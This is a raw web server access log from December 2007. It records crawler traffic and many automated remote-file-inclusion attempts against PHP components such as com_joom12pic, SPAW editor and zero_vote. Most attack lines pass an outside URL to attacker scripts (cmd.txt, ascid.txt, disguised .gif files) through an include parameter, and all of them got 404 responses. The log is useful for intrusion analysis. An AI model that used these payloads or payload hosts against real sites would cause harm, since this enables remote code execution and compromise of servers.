66.93.5.130 - - [15/Dec/2007:10:00:28 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:10:00:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:10:00:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:10:00:30 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:10:03:05 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:10:03:52 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:28 -0800] "GET /logs/access_071202.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:28 -0800] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:29 -0800] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:30 -0800] "GET /logs/access_071016.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:30 -0800] "GET /logs/access_071109.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.20 - - [15/Dec/2007:10:07:48 -0800] "GET /logs/access_071112.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://roxbackup.freehoxt.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:22 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:23 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:24 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:10:10:24 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.162 - - [15/Dec/2007:10:18:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.162 - - [15/Dec/2007:10:18:05 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.162 - - [15/Dec/2007:10:18:06 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.154.38.15 - - [15/Dec/2007:10:25:42 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.38.15 - - [15/Dec/2007:10:25:43 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.38.15 - - [15/Dec/2007:10:25:43 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.112.124.79 - - [15/Dec/2007:10:32:12 -0800] "GET /logs/access_071202.log/spaw_control.class.php?spaw_root=http://www.sexindustrie.be/ads/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [15/Dec/2007:10:32:12 -0800] "GET /spaw_control.class.php?spaw_root=http://www.sexindustrie.be/ads/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [15/Dec/2007:10:32:12 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.sexindustrie.be/ads/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.102 - - [15/Dec/2007:10:35:13 -0800] "GET /logs/access_071027.log HTTP/1.0" 200 191919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.112.124.79 - - [15/Dec/2007:10:38:00 -0800] "GET /logs/access_071126.log/spaw_control.class.php?spaw_root=http://www.sexindustrie.be/ads/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:50 -0800] "GET /logs/access_071202.log//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:50 -0800] "GET /logs/access_071202.log//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:50 -0800] "GET /logs/access_071202.log//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:50 -0800] "GET /logs/access_071202.log//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:51 -0800] "GET //skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:51 -0800] "GET //skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:51 -0800] "GET //skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:51 -0800] "GET //skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:52 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:52 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:52 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.66.112.173 - - [15/Dec/2007:10:41:52 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.26.160 - - [15/Dec/2007:10:41:53 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:10:42:40 -0800] "GET /logs/access_071202.log/spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:10:42:40 -0800] "GET /spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:10:42:41 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.145.201 - - [15/Dec/2007:10:43:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.201 - - [15/Dec/2007:10:43:20 -0800] "GET / HTTP/1.0" 200 2946 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
88.80.202.168 - - [15/Dec/2007:11:01:53 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.unkown.nl/modules/vwar/upload/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
88.80.202.168 - - [15/Dec/2007:11:01:53 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.unkown.nl/modules/vwar/upload/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.30.215.99 - - [15/Dec/2007:11:04:20 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.54.196.220 - - [15/Dec/2007:11:09:41 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.54.196.220 - - [15/Dec/2007:11:09:42 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.27.14 - - [15/Dec/2007:11:10:11 -0800] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.221 - - [15/Dec/2007:11:12:58 -0800] "GET /logs/access_070906.log HTTP/1.0" 200 32974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.117 - - [15/Dec/2007:11:27:55 -0800] "GET /retreat1/webcam/?S=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.200.57.132 - - [15/Dec/2007:11:31:28 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.123.238.8 - - [15/Dec/2007:11:32:00 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.dmulk.com"
63.123.238.8 - - [15/Dec/2007:11:32:00 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:11:40:22 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:11:40:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:11:40:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:11:40:23 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.114 - - [15/Dec/2007:11:44:57 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.114 - - [15/Dec/2007:11:44:57 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:11:46:44 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:11:50:18 -0800] "GET /logs/access_071202.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:11:50:18 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.40.31 - - [15/Dec/2007:11:55:56 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.z3roadster.it/home/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.135 - - [15/Dec/2007:11:56:37 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:12:02:40 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.35.179 - - [15/Dec/2007:12:05:45 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
66.135.40.31 - - [15/Dec/2007:12:08:26 -0800] "GET /logs/access_071202.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.z3roadster.it/home/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.40.31 - - [15/Dec/2007:12:08:26 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.z3roadster.it/home/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:12:11:31 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [15/Dec/2007:12:11:31 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.209.204 - - [15/Dec/2007:12:15:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [15/Dec/2007:12:15:50 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.24.21 - - [15/Dec/2007:12:18:05 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.156 - - [15/Dec/2007:12:26:57 -0800] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.45 - - [15/Dec/2007:12:33:35 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 54880 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:12:34:24 -0800] "GET /logs/access_071202.log/skin/zero_vote/setup.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:12:34:24 -0800] "GET /skin/zero_vote/setup.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:12:34:25 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.199 - - [15/Dec/2007:12:43:18 -0800] "GET /tmp/sess_7a4e9714160074196e872f9af7803d65 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.201 - - [15/Dec/2007:12:51:48 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.162 - - [15/Dec/2007:12:54:30 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.54.196.220 - - [15/Dec/2007:12:58:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.54.196.220 - - [15/Dec/2007:12:58:12 -0800] "GET //skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.25.164 - - [15/Dec/2007:13:03:23 -0800] "GET /logs/access_071205.log HTTP/1.0" 200 50665 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:37 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:39 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:42 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:42 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:45 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:06:45 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.15 - - [15/Dec/2007:13:09:37 -0800] "GET /?M=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.37 - - [15/Dec/2007:13:09:48 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:13:10:18 -0800] "GET /skin/zero_vote/setup.php?dir=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.154 - - [15/Dec/2007:13:14:37 -0800] "GET /logs/access_071207.log HTTP/1.0" 200 248258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:26:11 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:26:15 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:26:19 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:30:50 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:30:56 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.249.182.73 - - [15/Dec/2007:13:31:01 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.204 - - [15/Dec/2007:13:33:38 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.252.149.15 - - [15/Dec/2007:13:38:12 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.15 - - [15/Dec/2007:13:38:15 -0800] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
74.6.25.114 - - [15/Dec/2007:13:40:46 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.114 - - [15/Dec/2007:13:40:47 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.140.130 - - [15/Dec/2007:13:47:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.140.130 - - [15/Dec/2007:13:47:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
